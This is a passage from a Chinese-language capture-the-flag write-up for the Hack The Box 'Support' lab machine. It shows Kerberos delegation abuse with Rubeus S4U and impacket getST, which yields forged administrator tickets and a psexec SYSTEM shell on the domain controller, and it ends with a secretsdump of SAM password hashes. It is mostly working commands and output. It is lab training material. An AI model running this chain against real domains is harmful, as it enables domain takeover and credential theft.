gZCZRMkEZUlgGClrJfkLY4d25I6oJMYbgthtE7VKP0sfuTVkeJm5pV2R2QxBy59fn65n2VIMwkx2btmW8uRFdaycrAYsP7DVEWz+CVeJ4whajYCMHK8P6kHRXBx9CZwaesWn7lPZys9LdDBtlZlKHUlzRxB/aI0JVpu/2fTSNchxChG2CPxTnVAFra0WtbKj77Y2BWw8QoCSy3yjQxg0eqeE0bf9kYQEPUu6VfbE+drOvTCJvhglOJjYksku7HA21i0jvem/Lb818je1tmFS3t27kYB/YoRqT0UNOrKq76jPDBJ0VqJ7OkhunsFRAY4/nz9/C7hOM2ymDIR5t8++yv+UY2CWo0ZqODOSnHEHQ0NG71+bT517/vizf7eEnJJt27M7DnAPBzuv6OmoeoIvZvsGxjv8s8YUHiglqAjQs1/KmIGo0HcYNgeyuz15yfji4Eo4HYMIHVoAMCAQCigc0Egcp9gccwgcSggcEwgb4wgbugGzAZoAMCARehEgQQzu+kHBIv+nvlt2tAwTp/K6ENGwtTVVBQT1JULkhUQqIaMBigAwIBAaERMA8bDUZha2Vjb21wdXRlciSjBwMFAEDhAAClERgPMjAyNTA1MzAxNzEzMzlaphEYDzIwMjUwNTMxMDMxMzM5WqcRGA8yMDI1MDYwNjE3MTMzOVqoDRsLU1VQUE9SVC5IVEKpIDAeoAMCAQKhFzAVGwZrcmJ0Z3QbC3N1cHBvcnQuaHRi
[*] Action: S4U
[*] Building S4U2self request for: 'Fakecomputer$@SUPPORT.HTB'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2self request to ::1:88
[+] S4U2self success!
[*] Got a TGS for 'administrator' to 'Fakecomputer$@SUPPORT.HTB'
[*] base64(ticket.kirbi):
doIFrjCCBaqgAwIBBaEDAgEWooIExzCCBMNhggS/MIIEu6ADAgEFoQ0bC1NVUFBPUlQuSFRCohowGKADAgEBoREwDxsNRmFrZWNvbXB1dGVyJKOCBIcwggSDoAMCARehAwIBAaKCBHUEggRxhG2Xv0EAgEpq1aeOEzARKDyvBavybmVsTnSZ+t4UYFVr2BPnOo+a1CDzKnao2v85B0LmVYK3GO7hiYprLl4ZDH94kS9CFgtWqctxploZe6t2jm3HKIh23NDkTKq7hxaSz3mAkAKJofz+hAADbaQmh2HRcWebzzfy3+e2lJ9f1dIF/Ft0w0D+n/DovkNTumNweQZAR8hO2b69DouvBd4dHNBpluApmtjl5nVzE0mNfrJBRCbk/7va9hwQwxooSy3A5mt3gPu26EApjyvP+LEccq9eajhWzfMJwx3upo74UB++xbx1Jz8hlTArG+Olc32K1B1P2Baea4D8RqQofhw0oymt5JNqMiHh3Z3TqwvI/05yzAoZEFA9KqSmXFdxANnUB32yIlog7Iorko4n7sCqiLZOU65oiK0OpDgm2ZDQ1lTFaxoyfub8G4MmCUeaKRExUDpuvRYbmdDo43y5rbGiwWCFeBBeLgqxK01w6iGeXTy6zfOy8ti6TD/jxHCM4vGWH2Gbnrix1R3+bNQYT1OQikTBPVltAUL8HFak/JKy0ygfDy1/WGdM+YNQ++5Vkgo6BeaEJoNd7VYN3HG4GVyoJayueclVUCRse6vdf1wAoAKJQhcEZgWM3K0WcGyOWQ0XTK7U79rbg03i4oS4ipRJcxpxixlgKyGAwUVZGRefkm+WmvQCp+3odhkEUkzrwDloEHT5ExjYP7jM9bGr3fW+NB83tfBMnkStPf3eazhM3hgPSGKYjjNu+Xrc/KA4KO+uKbLr3hSLOx1TSkWZgIKm653t8X1WQLz4Y5gPadXFeHLpnooZrYQaSnYQrQOQw8aMDC1qisjg2zOE8nSTQE8SZZ05mvVx5JeYC4OSBT2cCucAreYAliXWkl4nHGR/53nv+IUBnLjpLD3xPfUBA+32437yqFi5W8gLIosW0qplIBmgBzadXwBs+U82W0WXksSqi3CeRPWXW5ba4Jl5T5MAldOr5fyKpgS9c5XqCpa7TPx9rZsglBg/EPNcznoO/dXBm/mwhvpvn9se2s4p0UOSLFGBerAq/dDkVJdzl2Y7R7Ve6EJoMjiiNgK4Q4FrX9IJ4EoPgV9YyJoKQa0o6+S9tgWsqi5PilufszdnmmL3VSfCEOb/n+aYkIGRqXVPvVgXtClEGNBG2PNtS2CTajXJWg5mVUvoNh5kd8KCKTTR+DQI+XtqBkycT0UDw2hjliTyGfQ5Q+pVsshtRioZtxPBKdfNYTzJmFPxPHbionSwj6s+WoAu1+qZozRrI1Q8BCDda2ILMGmEE3oLkO3mj4Ll14o+22tVtOImWMBcDO+pQHRPU6nncrB4q7JHnvgkAhOJ9bm8I5hli0lVWak5II9UfTD8r7pmPqJJNrknxwwVJVfwmy68XJ6R8ll2r5ock89G56Y2LmDHz8fKZbCk/qUnWxBaXWwGFJV5JtaUD8Xo5sxlSjU1Ysl0bXFxTkTsUA8FWb1xUSyD23jvAddL7lPW5HabtXRL9y50FJeB0V8LlBkNo4HSMIHPoAMCAQCigccEgcR9gcEwgb6ggbswgbgwgbWgGzAZoAMCARehEgQQlbObSer7oyeK57Dx7wqiX6ENGwtTVVBQT1JULkhUQqIaMBigAwIBCqERMA8bDWFkbWluaXN0cmF0b3KjBwMFAEChAAClERgPMjAyNTA1MzAxNzEzMzlaphEYDzIwMjUwNTMxMDMxMzM5WqcRGA8yMDI1MDYwNjE3MTMzOVqoDRsLU1VQUE9SVC5IVEKpGjAYoAMCAQGhETAPGw1GYWtlY29tcHV0ZXIk
[*] Ticket written to ticket_administrator_to_Fakecomputer$@SUPPORT.HTB.kirbi
[*] Impersonating user 'administrator' to target SPN 'cifs/dc.support.htb'
[*] Building S4U2proxy request for service: 'cifs/dc.support.htb'
[*] Using domain controller: dc.support.htb (::1)
[*] Sending S4U2proxy request to domain controller ::1:88
[+] S4U2proxy success!
[*] base64(ticket.kirbi) for SPN 'cifs/dc.support.htb':
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
[*] Ticket written to ticket_cifs_dc.support.htb.kirbi
[+] Ticket successfully imported!
*Evil-WinRM* PS C:\Users\support\Documents> ls
Directory: C:\Users\support\Documents
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/30/2025 10:04 AM 1355264 mimikatz.exe
-a---- 5/30/2025 8:54 AM 135576 Powermad.ps1
-a---- 5/30/2025 8:55 AM 770279 PowerView.ps1
-a---- 5/30/2025 8:56 AM 446976 Rubeus.exe
-a---- 5/30/2025 10:13 AM 1458 ticket_administrator_to_Fakecomputer$@SUPPORT.HTB.kirbi
-a---- 5/30/2025 10:13 AM 1652 ticket_cifs_dc.support.htb.kirbi
然后可以看一下我们现在内存中的票据
*Evil-WinRM* PS C:\Users\support\Documents> .\Rubeus.exe klist
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v2.2.0
Action: List Kerberos Tickets (Current User)
[*] Current LUID : 0x6e7caa
UserName : support
Domain : SUPPORT
LogonId : 0x6e7caa
UserSID : S-1-5-21-1677581083-3380853377-188903654-1105
AuthenticationPackage : NTLM
LogonType : Network
LogonTime : 5/30/2025 8:53:59 AM
LogonServer : DC
LogonServerDNSDomain : support.htb
UserPrincipalName : support@support.htb
[0] - 0x12 - aes256_cts_hmac_sha1
Start/End/MaxRenew: 5/30/2025 9:47:42 AM ; 5/30/2025 7:47:42 PM ; 6/6/2025 9:47:42 AM
Server Name : cifs/dc.support.htb @ SUPPORT.HTB
Client Name : administrator @ SUPPORT.HTB #可以发现这里已经有管理员的票据了
Flags : name_canonicalize, ok_as_delegate, pre_authent, renewable, forwardable (40a50000)
虽然我们已经注入了冒充管理员的票据,但使用 /ptt 通过票据仍然无法访问 c$ 共享或使用 psexec 启动 cmd,因为我们需要本地管理员权限
所以我们可以复制这个base64的票据,把他由 .kirbi 转换为impacket支持的 .ccache 格式
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# echo 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 > ticket.kirbi.b64
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# cat ticket.kirbi.b64 |tr -d ' ' |tr -d '\n' |base64 -d >ticket.kirbi
转换为 Impacket 可以使用的格式
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-ticketConverter ticket.kirbi ticket.ccache
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] converting kirbi to ccache...
[+] done
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# export KRB5CCNAME=ticket.ccache
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ntpdate 10.10.11.174
2025-05-30 13:24:12.470470 (-0400) -1276.481508 +/- 0.041695 10.10.11.174 s1 no-leap
CLOCK: time stepped by -1276.481508
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-psexec support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Requesting shares on dc.support.htb.....
[*] Found writable share ADMIN$
[*] Uploading file dMMwHPgE.exe
[*] Opening SVCManager on dc.support.htb.....
[*] Creating service NSNW on dc.support.htb.....
[*] Starting service NSNW.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.20348.859]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>
c:\Users\Administrator\Desktop> type root.txt
ad596a7d1e8efbfaefb0dea169c2f4e0
或者我们可以使用 impacket 的 getST 来请求服务凭证,并使用 psexec 、 wmiexec 或 smbexec 来获取一个 shell
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-getST -spn 'cifs/DC.support.htb' -impersonate Administrator -dc-ip 10.10.11.174 'support.htb/FakeComputer$:Password123'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_DC.support.htb@SUPPORT.HTB.ccache
dcsync
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# ntpdate 10.10.11.174
2025-05-30 13:33:32.258912 (-0400) -1276.483744 +/- 0.040620 10.10.11.174 s1 no-leap
CLOCK: time stepped by -1276.483744
┌──(root㉿kali)-[~/Desktop/htb/support]
└─# impacket-secretsdump support.htb/administrator@dc.support.htb -k -no-pass
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xf678b2597ade18d88784ee424ddc0d1a
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb06cbc02b39abeddd1335bc30b19e26:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[*] Dumping cached domain logon information (domain/username:hash)
[-] LSA hashes extraction failed: The NETBIOS connection with the remote host timed out.#超时了,网络太卡了
